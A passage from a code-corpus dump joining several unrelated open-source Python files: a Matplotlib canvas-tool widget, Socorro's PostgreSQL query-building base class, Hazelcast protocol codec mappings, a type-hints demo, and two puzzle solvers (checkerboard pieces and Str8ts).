If True, update canvas by blitting, which is much faster than normal
redrawing (turn off for debugging purposes).
"""
def __init__(self, ax, on_move=None, on_enter=None, on_release=None,
useblit=True):
self.ax = ax
self.canvas = ax.figure.canvas
self.img_background = None
self.cids = []
self._artists = []
self.active = True
if useblit:
self.connect_event('draw_event', self._blit_on_draw_event)
self.useblit = useblit
self.callback_on_move = _pass if on_move is None else on_move
self.callback_on_enter = _pass if on_enter is None else on_enter
self.callback_on_release = _pass if on_release is None else on_release
self.connect_event('key_press_event', self._on_key_press)
def connect_event(self, event, callback):
"""Connect callback with an event.
This should be used in lieu of `figure.canvas.mpl_connect` since this
function stores call back ids for later clean up.
"""
cid = self.canvas.mpl_connect(event, callback)
self.cids.append(cid)
def disconnect_events(self):
"""Disconnect all events created by this widget."""
for c in self.cids:
self.canvas.mpl_disconnect(c)
def ignore(self, event):
"""Return True if event should be ignored.
This method (or a version of it) should be called at the beginning
of any event callback.
"""
return not self.active
def set_visible(self, val):
for artist in self._artists:
artist.set_visible(val)
def _blit_on_draw_event(self, event=None):
self.img_background = self.canvas.copy_from_bbox(self.ax.bbox)
self._draw_artists()
def _draw_artists(self):
for artist in self._artists:
self.ax.draw_artist(artist)
def remove(self):
"""Remove artists and events from axes.
Note that the naming here mimics the interface of Matplotlib artists.
"""
#TODO: For some reason, RectangleTool doesn't get properly removed
self.disconnect_events()
for a in self._artists:
a.remove()
def redraw(self):
"""Redraw image and canvas artists.
This method should be called by subclasses when artists are updated.
"""
if self.useblit and self.img_background is not None:
self.canvas.restore_region(self.img_background)
self._draw_artists()
self.canvas.blit(self.ax.bbox)
else:
self.canvas.draw_idle()
def _on_key_press(self, event):
if event.key == 'enter':
self.callback_on_enter(self.geometry)
self.set_visible(False)
self.redraw()
@property
def geometry(self):
"""Geometry information that gets passed to callback functions."""
return None
class ToolHandles(object):
"""Control handles for canvas tools.
Parameters
----------
ax : :class:`matplotlib.axes.Axes`
Matplotlib axes where tool handles are displayed.
x, y : 1D arrays
Coordinates of control handles.
marker : str
Shape of marker used to display handle. See `matplotlib.pyplot.plot`.
marker_props : dict
Additional marker properties. See :class:`matplotlib.lines.Line2D`.
"""
def __init__(self, ax, x, y, marker='o', marker_props=None):
self.ax = ax
props = dict(marker=marker, markersize=7, mfc='w', ls='none',
alpha=0.5, visible=False)
props.update(marker_props if marker_props is not None else {})
self._markers = lines.Line2D(x, y, animated=True, **props)
self.ax.add_line(self._markers)
self.artist = self._markers
@property
def x(self):
return self._markers.get_xdata()
@property
def y(self):
return self._markers.get_ydata()
def set_data(self, pts, y=None):
"""Set x and y positions of handles"""
if y is not None:
x = pts
pts = np.array([x, y])
self._markers.set_data(pts)
def set_visible(self, val):
self._markers.set_visible(val)
def set_animated(self, val):
self._markers.set_animated(val)
def draw(self):
self.ax.draw_artist(self._markers)
def closest(self, x, y):
"""Return index and pixel distance to closest index."""
pts = np.transpose((self.x, self.y))
# Transform data coordinates to pixel coordinates.
pts = self.ax.transData.transform(pts)
diff = pts - ((x, y))
dist = np.sqrt(np.sum(diff**2, axis=1))
return np.argmin(dist), np.min(dist)
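# Hedged usage sketch (added for illustration; assumes Matplotlib is available and the
# caller passes in an Axes object from an interactive figure).
def _example_tool_handles(ax):
    """Place two square handles on `ax` and find the one closest to a pixel position."""
    handles = ToolHandles(ax, x=[0.2, 0.8], y=[0.5, 0.5], marker='s')
    handles.set_visible(True)
    handles.draw()
    index, dist = handles.closest(100, 100)  # (x, y) in pixel coordinates
    return index, dist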
| bsd-3-clause | -8,322,848,763,189,975,000 | 30.448276 | 78 | 0.606725 | false |
rhelmer/socorro-lib | socorro/external/postgresql/base.py | 1 | 15947 | # This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
"""Deprecated by socorro/external/postgresql/service_base.py"""
import contextlib
import logging
import psycopg2
import socorro.database.database as db
from socorro.external import DatabaseError
from .dbapi2_util import execute_query_fetchall, single_value_sql
logger = logging.getLogger("webapi")
def add_param_to_dict(dictionary, key, value):
"""
Dispatch a list of parameters into a dictionary.
"""
for i, elem in enumerate(value):
dictionary[key + str(i)] = elem
return dictionary
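# Worked example (added for clarity):
#   add_param_to_dict({}, "product", ["Firefox", "Thunderbird"])
#   -> {"product0": "Firefox", "product1": "Thunderbird"}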
class PostgreSQLBase(object):
"""
Base class for PostgreSQL based service implementations.
"""
def __init__(self, *args, **kwargs):
"""
Store the config and create a connection to the database.
Keyword arguments:
config -- Configuration of the application.
"""
self.context = kwargs.get("config")
if hasattr(self.context, 'database'):
# XXX this should be replaced with connection_context instead
self.context.database['database_host'] = \
self.context.database.database_hostname
self.context.database['database_port'] = \
self.context.database.database_port
self.context.database['database_name'] = \
self.context.database.database_name
self.context.database['database_username'] = \
self.context.database.database_username
self.context.database['database_password'] = \
self.context.database.database_password
self.database = db.Database(self.context.database)
else:
# the old middleware
self.database = db.Database(self.context)
@contextlib.contextmanager
def get_connection(self):
connection = self.database.connection()
try:
yield connection
finally:
connection.close()
def query(self, sql, params=None, error_message=None, connection=None):
"""Return the result of a query executed against PostgreSQL.
Create a connection, open a cursor, execute the query and return the
        results. If an error occurs, log it and raise a DatabaseError.
Keyword arguments:
sql -- SQL query to execute.
params -- Parameters to merge into the SQL query when executed.
error_message -- Eventual error message to log.
connection -- Optional connection to the database. If none, a new one
will be opened.
"""
fresh_connection = False
try:
if not connection:
connection = self.database.connection()
fresh_connection = True
# self.context.logger.debug(connection.cursor.mogrify(sql, params))
results = execute_query_fetchall(connection, sql, params)
except psycopg2.Error, e:
if error_message is None:
error_message = "Failed to execute query against PostgreSQL"
error_message = "%s - %s" % (error_message, str(e))
logger.error(error_message, exc_info=True)
raise DatabaseError(error_message)
finally:
if connection and fresh_connection:
connection.close()
return results
def count(self, sql, params=None, error_message=None, connection=None):
"""Return the result of a count SQL query executed against PostgreSQL.
Create a connection, open a cursor, execute the query and return the
        result. If an error occurs, log it and raise a DatabaseError.
Keyword arguments:
sql -- SQL query to execute.
params -- Parameters to merge into the SQL query when executed.
error_message -- Eventual error message to log.
connection -- Optional connection to the database. If none, a new one
will be opened.
"""
fresh_connection = False
try:
if not connection:
connection = self.database.connection()
fresh_connection = True
# self.context.logger.debug(connection.cursor.mogrify(sql, params))
result = single_value_sql(connection, sql, params)
except psycopg2.Error, e:
if error_message is None:
error_message = "Failed to execute count against PostgreSQL"
error_message = "%s - %s" % (error_message, str(e))
logger.error(error_message, exc_info=True)
raise DatabaseError(error_message)
finally:
if connection and fresh_connection:
connection.close()
return result
@staticmethod
def parse_versions(versions_list, products):
"""
Parses the versions, separating by ":" and returning versions
and products.
"""
versions = []
for v in versions_list:
if v.find(":") > -1:
pv = v.split(":")
versions.append(pv[0])
versions.append(pv[1])
else:
products.append(v)
return (versions, products)
@staticmethod
def prepare_terms(terms, search_mode):
"""
Prepare terms for search, adding '%' where needed,
given the search mode.
"""
if search_mode in ("contains", "starts_with"):
terms = terms.replace("_", "\_").replace("%", "\%")
if search_mode == "contains":
terms = "%" + terms + "%"
elif search_mode == "starts_with":
terms = terms + "%"
return terms
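    # Worked example (added for clarity): prepare_terms("sig%nal", "contains")
    # escapes the wildcard and wraps the term for a LIKE query, giving "%sig\%nal%".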
@staticmethod
def dispatch_params(sql_params, key, value):
"""
Dispatch a parameter or a list of parameters into the params array.
"""
if not isinstance(value, list):
sql_params[key] = value
else:
for i, elem in enumerate(value):
sql_params[key + str(i)] = elem
return sql_params
@staticmethod
def build_reports_sql_from(params):
"""
Generate and return the FROM part of the final SQL query.
"""
sql_from = ["FROM reports r"]
## Searching through plugins
if params["report_process"] == "plugin":
sql_from.append(("plugins_reports ON "
"plugins_reports.report_id = r.id"))
sql_from.append(("plugins ON "
"plugins_reports.plugin_id = plugins.id"))
sql_from = " JOIN ".join(sql_from)
return sql_from
@staticmethod
def build_reports_sql_where(params, sql_params, config):
"""Return a string containing the WHERE part of a search-related SQL
query.
"""
if hasattr(config, "webapi"):
config = config.webapi
sql_where = ["""
WHERE r.date_processed BETWEEN %(from_date)s AND %(to_date)s
"""]
sql_params["from_date"] = params["from_date"]
sql_params["to_date"] = params["to_date"]
## Adding terms to where clause
if params["terms"]:
if params["search_mode"] == "is_exactly":
sql_where.append("r.signature=%(term)s")
else:
sql_where.append("r.signature LIKE %(term)s")
sql_params["term"] = params["terms"]
## Adding products to where clause
if params["products"]:
products_list = ["r.product=%(product" + str(x) + ")s"
for x in range(len(params["products"]))]
sql_where.append("(%s)" % (" OR ".join(products_list)))
sql_params = add_param_to_dict(sql_params, "product",
params["products"])
## Adding OS to where clause
if params["os"]:
os_list = ["r.os_name=%(os" + str(x) + ")s"
for x in range(len(params["os"]))]
sql_where.append("(%s)" % (" OR ".join(os_list)))
sql_params = add_param_to_dict(sql_params, "os", params["os"])
## Adding versions to where clause
if params["versions"]:
versions_where = []
version_index = 0
# For each version, get information about it
for i in range(0, len(params["versions"]), 2):
versions_info = params["versions_info"]
product = params["versions"][i]
version = params["versions"][i + 1]
key = "%s:%s" % (product, version)
version_data = None
if key in versions_info:
version_data = versions_info[key]
if version_data and version_data["is_rapid_beta"]:
# If the version is a rapid beta, that means it's an
# alias for a list of other versions. We thus don't filter
# on that version, but on all versions listed in the
# version_data that we have.
# Get all versions that are linked to this rapid beta.
rapid_beta_versions = [
x for x in versions_info
if versions_info[x]["from_beta_version"] == key
and not versions_info[x]["is_rapid_beta"]
]
for rapid_beta in rapid_beta_versions:
versions_where.append(
PostgreSQLBase.build_version_where(
product,
versions_info[rapid_beta]["version_string"],
version_index,
sql_params,
versions_info[rapid_beta],
config
)
)
version_index += 2
else:
# This is a "normal" version, let's filter on it
versions_where.append(
PostgreSQLBase.build_version_where(
product,
version,
version_index,
sql_params,
version_data,
config
)
)
version_index += 2
if versions_where:
sql_where.append("(%s)" % " OR ".join(versions_where))
## Adding build id to where clause
if params["build_ids"]:
build_ids_list = ["r.build=%(build" + str(x) + ")s"
for x in range(len(params["build_ids"]))]
sql_where.append("(%s)" % (" OR ".join(build_ids_list)))
sql_params = add_param_to_dict(sql_params, "build",
params["build_ids"])
## Adding reason to where clause
if params["reasons"]:
reasons_list = ["r.reason=%(reason" + str(x) + ")s"
for x in range(len(params["reasons"]))]
sql_where.append("(%s)" % (" OR ".join(reasons_list)))
sql_params = add_param_to_dict(sql_params, "reason",
params["reasons"])
## Adding release channels to where clause
if params["release_channels"]:
channels_list = [
"UPPER(r.release_channel)=UPPER(%%(release_channel%s)s)" % x
for x in range(len(params["release_channels"]))
]
sql_where.append("(%s)" % " OR ".join(channels_list))
sql_params = add_param_to_dict(
sql_params,
"release_channel",
params["release_channels"]
)
## Adding report type to where clause
if params["report_type"] == "crash":
sql_where.append("r.hangid IS NULL")
elif params["report_type"] == "hang":
sql_where.append("r.hangid IS NOT NULL")
## Searching through plugins
if params["report_process"] == "plugin":
sql_where.append("r.process_type = 'plugin'")
sql_where.append(("plugins_reports.date_processed BETWEEN "
"%(from_date)s AND %(to_date)s"))
if params["plugin_terms"]:
comp = "="
if params["plugin_search_mode"] in ("contains", "starts_with"):
comp = " LIKE "
sql_where_plugin_in = []
for f in params["plugin_in"]:
if f == "name":
field = "plugins.name"
elif f == "filename":
field = "plugins.filename"
sql_where_plugin_in.append(comp.join((field,
"%(plugin_term)s")))
sql_params["plugin_term"] = params["plugin_terms"]
sql_where.append("(%s)" % " OR ".join(sql_where_plugin_in))
elif params["report_process"] == "browser":
sql_where.append("r.process_type IS NULL")
elif params["report_process"] == "content":
sql_where.append("r.process_type = 'content'")
sql_where = " AND ".join(sql_where)
return (sql_where, sql_params)
@staticmethod
def build_reports_sql_limit(params, sql_params):
"""
"""
sql_limit = """
LIMIT %(limit)s
OFFSET %(offset)s
"""
sql_params["limit"] = params["result_number"]
sql_params["offset"] = params["result_offset"]
return (sql_limit, sql_params)
@staticmethod
def build_version_where(
product,
version,
version_index,
sql_params,
version_data,
config
):
"""Return the content of WHERE of a SQL query for a given version. """
version_where = []
product_param = "version%s" % version_index
version_param = "version%s" % (version_index + 1)
sql_params[product_param] = product
sql_params[version_param] = version
if version_data and version_data["release_channel"]:
# If we have data about that version, and it has a release channel,
# we will want to add some more specific filters to the SQL query.
channel = version_data["release_channel"].lower()
if channel.startswith(tuple(config.non_release_channels)):
# This is a non-release channel.
# Use major_version instead of full version.
sql_params[version_param] = version_data["major_version"]
# Restrict by release_channel.
version_where.append("r.release_channel ILIKE '%s'" % channel)
if (
channel.startswith(tuple(config.restricted_channels)) and
version_data["build_id"]
):
# Restrict to a list of build_id.
builds = ", ".join(
"'%s'" % b for b in version_data["build_id"]
)
version_where.append("r.build IN (%s)" % builds)
else:
# It's a release.
version_where.append((
"r.release_channel NOT IN %s" %
(tuple(config.non_release_channels),)
))
version_where.append("r.product=%%(version%s)s" % version_index)
version_where.append("r.version=%%(version%s)s" % (version_index + 1))
return "(%s)" % " AND ".join(version_where)
| mpl-2.0 | 5,074,017,094,719,367,000 | 36.259346 | 79 | 0.519408 | false |
mmedenjak/hazelcast-client-protocol | py/__init__.py | 1 | 10457 | import keyword
import re
def py_types_encode_decode(t):
if t not in _py_types:
raise NotImplementedError("Missing type Mapping")
_pattern1 = re.compile("(.)([A-Z][a-z]+)")
_pattern2 = re.compile("([a-z0-9])([A-Z])")
def py_param_name(type_name):
type_name = _pattern1.sub(r"\1_\2", type_name)
type_name = _pattern2.sub(r"\1_\2", type_name).lower()
if keyword.iskeyword(type_name):
return "_%s" % type_name
return type_name
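# Illustrative conversions (examples only): CamelCase protocol type names are
# turned into snake_case parameter names, with Python keywords prefixed.
#   py_param_name("ReplicatedMap") -> "replicated_map"
#   py_param_name("UUID")          -> "uuid"
#   py_param_name("from")          -> "_from"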
def py_get_import_path_holders(param_type):
return import_paths.get(param_type, [])
py_ignore_service_list = {
"Cache",
"CardinalityEstimator",
"Client.addPartitionLostListener",
"Client.authenticationCustom",
"Client.createProxies",
"Client.removeMigrationListener",
"Client.removePartitionLostListener",
"Client.triggerPartitionAssignment",
"ContinuousQuery",
"CPSubsystem",
"DurableExecutor",
"DynamicConfig",
"ExecutorService.cancelOnMember",
"ExecutorService.cancelOnPartition",
"Map.addPartitionLostListener",
"Map.aggregate",
"Map.aggregateWithPredicate",
"Map.eventJournalRead",
"Map.eventJournalSubscribe",
"Map.project",
"Map.projectWithPredicate",
"Map.removeAll",
"Map.removeInterceptor",
"Map.removePartitionLostListener",
"Map.submitToKey",
"MultiMap.delete",
"MC",
"Queue.drainTo",
"ReplicatedMap.addNearCacheEntryListener",
"ScheduledExecutor",
"Sql",
"Topic.publishAll",
"TransactionalMap.containsValue",
"XATransaction",
}
class ImportPathHolder:
def __init__(self, name, path):
self.name = name
self.path = path
def get_import_statement(self):
return "from hazelcast.%s import %s" % (self.path, self.name)
class PathHolders:
DataCodec = ImportPathHolder("DataCodec", "protocol.builtin")
ByteArrayCodec = ImportPathHolder("ByteArrayCodec", "protocol.builtin")
LongArrayCodec = ImportPathHolder("LongArrayCodec", "protocol.builtin")
Address = ImportPathHolder("Address", "core")
AddressCodec = ImportPathHolder("AddressCodec", "protocol.codec.custom.address_codec")
ErrorHolder = ImportPathHolder("ErrorHolder", "protocol")
ErrorHolderCodec = ImportPathHolder("ErrorHolderCodec", "protocol.codec.custom.error_holder_codec")
StackTraceElement = ImportPathHolder("StackTraceElement", "protocol")
StackTraceElementCodec = ImportPathHolder("StackTraceElementCodec",
"protocol.codec.custom.stack_trace_element_codec")
SimpleEntryView = ImportPathHolder("SimpleEntryView", "core")
SimpleEntryViewCodec = ImportPathHolder("SimpleEntryViewCodec", "protocol.codec.custom.simple_entry_view_codec")
DistributedObjectInfo = ImportPathHolder("DistributedObjectInfo", "core")
DistributedObjectInfoCodec = ImportPathHolder("DistributedObjectInfoCodec",
"protocol.codec.custom.distributed_object_info_codec")
MemberInfo = ImportPathHolder("MemberInfo", "core")
MemberInfoCodec = ImportPathHolder("MemberInfoCodec", "protocol.codec.custom.member_info_codec")
MemberVersion = ImportPathHolder("MemberVersion", "core")
MemberVersionCodec = ImportPathHolder("MemberVersionCodec", "protocol.codec.custom.member_version_codec")
StringCodec = ImportPathHolder("StringCodec", "protocol.builtin", )
ListLongCodec = ImportPathHolder("ListLongCodec", "protocol.builtin")
ListIntegerCodec = ImportPathHolder("ListIntegerCodec", "protocol.builtin")
ListUUIDCodec = ImportPathHolder("ListUUIDCodec", "protocol.builtin")
ListDataCodec = ImportPathHolder("ListDataCodec", "protocol.builtin")
ListMultiFrameCodec = ImportPathHolder("ListMultiFrameCodec", "protocol.builtin")
EntryListCodec = ImportPathHolder("EntryListCodec", "protocol.builtin")
EntryListLongByteArrayCodec = ImportPathHolder("EntryListLongByteArrayCodec", "protocol.builtin")
EntryListIntegerUUIDCodec = ImportPathHolder("EntryListIntegerUUIDCodec", "protocol.builtin")
EntryListIntegerLongCodec = ImportPathHolder("EntryListIntegerLongCodec", "protocol.builtin")
EntryListIntegerIntegerCodec = ImportPathHolder("EntryListIntegerIntegerCodec", "protocol.builtin")
EntryListUUIDLongCodec = ImportPathHolder("EntryListUUIDLongCodec", "protocol.builtin")
EntryListUUIDUUIDCodec = ImportPathHolder("EntryListUUIDUUIDCodec", "protocol.builtin")
EntryListUUIDListIntegerCodec = ImportPathHolder("EntryListUUIDListIntegerCodec", "protocol.builtin")
MapCodec = ImportPathHolder("MapCodec", "protocol.builtin")
CodecUtil = ImportPathHolder("CodecUtil", "protocol.builtin")
IndexConfig = ImportPathHolder("IndexConfig", "config")
IndexConfigCodec = ImportPathHolder("IndexConfigCodec", "protocol.codec.custom.index_config_codec")
BitmapIndexOptions = ImportPathHolder("BitmapIndexOptions", "config")
BitmapIndexOptionsCodec = ImportPathHolder("BitmapIndexOptionsCodec",
"protocol.codec.custom.bitmap_index_options_codec")
PagingPredicateHolder = ImportPathHolder("PagingPredicateHolder", "protocol")
PagingPredicateHolderCodec = ImportPathHolder("PagingPredicateHolderCodec",
"protocol.codec.custom.paging_predicate_holder_codec")
AnchorDataListHolder = ImportPathHolder("AnchorDataListHolder", "protocol")
AnchorDataListHolderCodec = ImportPathHolder("AnchorDataListHolderCodec",
"protocol.codec.custom.anchor_data_list_holder_codec")
EndpointQualifier = ImportPathHolder("EndpointQualifier", "protocol")
EndpointQualifierCodec = ImportPathHolder("EndpointQualifierCodec",
"protocol.codec.custom.endpoint_qualifier_codec")
RaftGroupId = ImportPathHolder("RaftGroupId", "protocol")
RaftGroupIdCodec = ImportPathHolder("RaftGroupIdCodec", "protocol.codec.custom.raft_group_id_codec")
import_paths = {
"CodecUtil": PathHolders.CodecUtil,
"longArray": [PathHolders.LongArrayCodec],
"byteArray": [PathHolders.ByteArrayCodec],
"String": [PathHolders.StringCodec],
"Data": [PathHolders.DataCodec],
"Address": [PathHolders.Address, PathHolders.AddressCodec],
"ErrorHolder": [PathHolders.ErrorHolder, PathHolders.ErrorHolderCodec],
"StackTraceElement": [PathHolders.StackTraceElement, PathHolders.StackTraceElementCodec],
"SimpleEntryView": [PathHolders.SimpleEntryView, PathHolders.SimpleEntryViewCodec],
"DistributedObjectInfo": [PathHolders.DistributedObjectInfo, PathHolders.DistributedObjectInfoCodec],
"MemberInfo": [PathHolders.MemberInfo, PathHolders.MemberInfoCodec],
"MemberVersion": [PathHolders.MemberVersion, PathHolders.MemberVersionCodec],
"RaftGroupId": [PathHolders.RaftGroupId, PathHolders.RaftGroupIdCodec],
"List_Long": [PathHolders.ListLongCodec],
"List_Integer": [PathHolders.ListIntegerCodec],
"List_UUID": [PathHolders.ListUUIDCodec],
"List_String": [PathHolders.ListMultiFrameCodec, PathHolders.StringCodec],
"List_Data": [PathHolders.ListMultiFrameCodec, PathHolders.DataCodec],
"ListCN_Data": [PathHolders.ListMultiFrameCodec, PathHolders.DataCodec],
"List_MemberInfo": [PathHolders.ListMultiFrameCodec, PathHolders.MemberInfoCodec],
"List_DistributedObjectInfo": [PathHolders.ListMultiFrameCodec, PathHolders.DistributedObjectInfoCodec],
"List_StackTraceElement": [PathHolders.ListMultiFrameCodec, PathHolders.StackTraceElementCodec],
"EntryList_String_String": [PathHolders.EntryListCodec, PathHolders.StringCodec],
"EntryList_String_byteArray": [PathHolders.EntryListCodec, PathHolders.StringCodec, PathHolders.ByteArrayCodec],
"EntryList_Long_byteArray": [PathHolders.EntryListLongByteArrayCodec],
"EntryList_Integer_UUID": [PathHolders.EntryListIntegerUUIDCodec],
"EntryList_Integer_Long": [PathHolders.EntryListIntegerLongCodec],
"EntryList_Integer_Integer": [PathHolders.EntryListIntegerIntegerCodec],
"EntryList_UUID_Long": [PathHolders.EntryListUUIDLongCodec],
"EntryList_String_EntryList_Integer_Long": [PathHolders.EntryListCodec, PathHolders.StringCodec,
PathHolders.EntryListIntegerLongCodec],
"EntryList_UUID_UUID": [PathHolders.EntryListUUIDUUIDCodec],
"EntryList_UUID_List_Integer": [PathHolders.EntryListUUIDListIntegerCodec],
"EntryList_Data_Data": [PathHolders.EntryListCodec, PathHolders.DataCodec],
"EntryList_Data_List_Data": [PathHolders.EntryListCodec, PathHolders.DataCodec, PathHolders.ListDataCodec],
"Map_String_String": [PathHolders.MapCodec, PathHolders.StringCodec],
"IndexConfig": [PathHolders.IndexConfig, PathHolders.IndexConfigCodec],
"ListIndexConfig": [PathHolders.IndexConfigCodec, PathHolders.ListMultiFrameCodec],
"BitmapIndexOptions": [PathHolders.BitmapIndexOptions, PathHolders.BitmapIndexOptionsCodec],
"AnchorDataListHolder": [PathHolders.AnchorDataListHolder, PathHolders.AnchorDataListHolderCodec],
"PagingPredicateHolder": [PathHolders.PagingPredicateHolder, PathHolders.PagingPredicateHolderCodec],
"EndpointQualifier": [PathHolders.EndpointQualifier, PathHolders.EndpointQualifierCodec],
"Map_EndpointQualifier_Address": [PathHolders.MapCodec, PathHolders.EndpointQualifierCodec,
PathHolders.AddressCodec]
}
_py_types = {
"boolean",
"byte",
"int",
"long",
"UUID",
"byteArray",
"longArray",
"String",
"Data",
"Address",
"DistributedObjectInfo",
"SimpleEntryView",
"ErrorHolder",
"StackTraceElement",
"MemberInfo",
"MemberVersion",
"EndpointQualifier",
"RaftGroupId",
"AnchorDataListHolder",
"PagingPredicateHolder",
"IndexConfig",
"BitmapIndexOptions",
"List_Integer",
"List_Long",
"List_UUID",
"List_byteArray",
"List_Data",
"List_DistributedObjectInfo",
"List_MemberInfo",
"List_String",
"List_StackTraceElement",
"ListCN_Data",
"EntryList_UUID_Long",
"EntryList_String_String",
"EntryList_UUID_List_Integer",
"EntryList_Data_Data",
"Map_String_String",
"Map_EndpointQualifier_Address",
}
def py_escape_keyword(value):
if value in keyword.kwlist:
return "%s_" % value
else:
return value
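# Illustrative example (values invented): unlike py_param_name above, which
# prefixes keywords with an underscore, this helper appends one instead.
#   py_escape_keyword("import") -> "import_"
#   py_escape_keyword("name")   -> "name"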
| apache-2.0 | 2,040,683,131,968,967,400 | 44.864035 | 116 | 0.724969 | false |
chenpota/python | type-hints/example/01_builtin-type.py | 1 | 1067 | def pass_int(v: int) -> None:
pass
pass_int(3.4) # error
pass_int(5)
#######################################
def pass_float(v: float) -> None:
pass
pass_float(3.4)
pass_float(5)
#######################################
def pass_str(v: str) -> None:
pass
pass_str('text')
pass_str(3.4) # error
#######################################
def pass_bool(v: bool) -> None:
pass
pass_bool(3 == 3)
pass_bool(3) # error
#######################################
def pass_list(v: list) -> None:
pass
pass_list([])
pass_list([1, 's'])
pass_list(()) # error
#######################################
def pass_tuple(v: tuple) -> None:
pass
pass_tuple(())
pass_tuple((1, 's'))
pass_tuple([]) # error
#######################################
def get_int_v1() -> int:
return 1
def get_int_v2() -> int:
return 1.0 # error
#######################################
def get_float_v1() -> float:
return 1.0
def get_float_v2() -> float:
return 1
#######################################
def get_str() -> str:
return 'text'
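#######################################
# Additional illustrative example (not part of the original file), following
# the same pattern for dict annotations:
def pass_dict(v: dict) -> None:
    pass
pass_dict({})
pass_dict({'key': 1})
pass_dict([])  # error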
| mit | -6,946,783,613,546,199,000 | 14.242857 | 39 | 0.395501 | false |
pirius/draught-board-puzzle-aka-checkerboard-puzzle-solver | python/source/checkerboardpuzzle_utils.py | 1 | 1570 | from numpy import array, rot90, fliplr, array_equal
from checkerboardpuzzle_stone import Rotation
def generate_rotated_nparrays(nparray):
"""generate rotated and mirrored versions of given nparray."""
r1 = rot90(nparray)
r2 = rot90(r1)
r3 = rot90(r2)
f1 = fliplr(nparray)
f2 = fliplr(r1)
f3 = fliplr(r2)
f4 = fliplr(r3)
all_rot = [nparray,r1,r2,r3,f1,f2,f3,f4]
return all_rot
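# Illustrative example (shape invented): for a 1x2 domino the eight generated
# orientations contain only two distinct shapes.
#   generate_rotated_nparrays(array([[1, 1]]))
#   -> 8 arrays, of which only [[1, 1]] and [[1], [1]] differ; unique_nparrays
#      below would reduce the list to those two.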
def generate_rotations(fields):
"""generate all rotations of that stone."""
#r1 = rot90(fields)
#r2 = rot90(r1)
#r3 = rot90(r2)
#f1 = fliplr(fields)
#f2 = fliplr(r1)
#f3 = fliplr(r2)
#f4 = fliplr(r3)
#all_rot = [r1,r2,r3,f1,f2,f3,f4]
all_rot = generate_rotated_nparrays(fields)
# check if rotations are equal
rotations = [] # [Rotation(fields)]
for r_new in all_rot:
l = len(filter(lambda r_old:array_equal(r_old.nparray,r_new), rotations))
if l > 1:
raise Exception('Rotations doubled? That should be impossible!')
elif l == 0:
# not in rotations yet, add
rotations = rotations + [Rotation(r_new)]
return rotations
def unique_nparrays(nparrays):
"""return unique list of nparrays."""
unique = []
for a in nparrays:
for u in unique:
if (a == u).all():
break
else:
unique = unique + [a]
return unique
def append_to_file(filepath, text):
"""append text to given file."""
with open(filepath, 'a') as myfile:
myfile.write(text)
myfile.close() | lgpl-3.0 | 5,289,287,308,255,993,000 | 28.641509 | 81 | 0.593631 | false |
seeba8/str8tssolver | field.py | 1 | 6062 | from square import Square
from street import Street
class Field:
def __init__(self, test=None):
self.streets = set()
if test != None:
blacks = test["blacks"]
values = test["values"]
self.squares = [Square(i, blacks[i] == "1", "123456789" if values[i] == "0" else values[i]) for i in
range(81)]
self.collect_streets()
else:
self.squares = [Square(i) for i in range(81)]
def solve(self):
last_perf = 0
current_perf = 1
while (last_perf != current_perf):
last_perf = self.get_total_length()
self.eliminate_possibilities()
current_perf = self.get_total_length()
if self.is_solved():
return True
return False
def is_solved(self):
for s in self:
if not s.is_number() and not s.is_black:
return False
return True
def collect_streets(self):
for square in self:
if not square.is_black:
s = self.get_hstreet(square)
if s != None:
self.streets.add(s)
s = self.get_vstreet(square)
if s != None:
self.streets.add(s)
def __getitem__(self,i):
if isinstance(i,tuple):
x,y = i
if x < 0 or x >= 9 or y < 0 or y >= 9:
raise IndexError
i = y * 9 + x
try:
return self.squares[i]
except:
raise
def __iter__(self):
for s in self.squares:
yield s
def get_row(self, square, without_square=False):
for i in range(9):
s = self[i, square.y]
if not without_square or s != square:
yield s
def get_column(self, square, without_square=False):
for i in range(9):
s = self[square.x, i]
if not without_square or s != square:
yield s
def get_hstreet(self, square):
x = square.x
y = square.y
street = {square}
if x - 1 >= 0 and not self[x - 1, y].is_black:
return None
for i in range(1, 10):
try:
if not self[x + i, y].is_black:
street.add(self[x + i, y])
else:
return Street(street)
except IndexError:
return Street(street)
return Street(street)
def get_vstreet(self, square):
x = square.x
y = square.y
street = {square}
if y - 1 >= 0 and not self[x, y - 1].is_black:
return None
for i in range(1, 10):
try:
if not self[x, y + i].is_black:
street.add(self[x, y + i])
else:
return Street(street)
except:
return Street(street)
return Street(street)
def get_rest_without_street(self, street):
if street.is_horizontal:
y = street.y
for x in range(9):
if not self[x, y] in street:
yield self[x, y]
else:
x = street.x
for y in range(9):
if not self[x, y] in street:
yield self[x, y]
def remove_street_options_from_rest(self, street):
"""
e.g.: if len(street) == 2 and street_options = {1,2,3}, then
one value in the middle, {2}, can be removed
"""
street_options = street.get_options()
if len(street_options) < 9 and len(street_options) < len(street) * 2:
removables = ("".join(sorted(street_options))[len(street_options) -
len(street):len(street)])
for o in removables:
for s in self.get_rest_without_street(street):
s.remove_option(o)
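        # Worked example (values assumed): for a street of length 2 whose
        # combined options are {"1", "2", "3"}, only two consecutive digits
        # out of 1-3 can be used, so "2" is always among them. The sorted join
        # gives "123", the slice [3 - 2:2] = [1:2] picks "2", and "2" is then
        # removed from every square outside the street in that row/column.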
def eliminate_possibilities(self):
for square in self:
if square.is_number():
self.eliminate_rowcol(square)
for street in self.streets:
street.eliminate_nonconsec()
self.remove_street_options_from_rest(street)
for square in street:
if square.is_number():
street.eliminate_out_of_range(square)
def eliminate_rowcol(self, square):
v = square.get_value()
for s in self.get_row(square,True):
s.remove_option(v)
for s in self.get_column(square,True):
s.remove_option(v)
def _construct_output(self, show_hints=False):
rowsep = "+-------" * 9 + "+\n"
rowstart = ["| "]*3
output = rowsep
sa = rowstart
for i in range(81):
s = self[i]
placeholder = "\u2588" if s.is_black else " "
if s.is_number():
sa = [sa[r] + placeholder + (s.get_value() if r == 1 else placeholder)
+ placeholder for r in range(3)]
else:
if show_hints and not s.is_black:
o = self[i].get_options()
options = "".join([str(r) if str(r) in o else placeholder for r in range(1, 10)])
sa = [sa[r] + options[3 * r:3 * (r + 1)] for r in range(3)]
else:
sa = [sa[r] + placeholder*3 for r in range(3)]
sa = [sa[r] + " | " for r in range(3)]
if (i+1) % 9 == 0:
output += "\n".join(sa) + "\n"
output += rowsep
sa = rowstart
return output[:-1]
def __str__(self):
return self._construct_output()
def show(self):
print(str(self))
return str(self)
def show_hints(self):
s = self._construct_output(True)
print(s)
return s
def get_total_length(self):
return len("".join(s.get_options() for s in self))
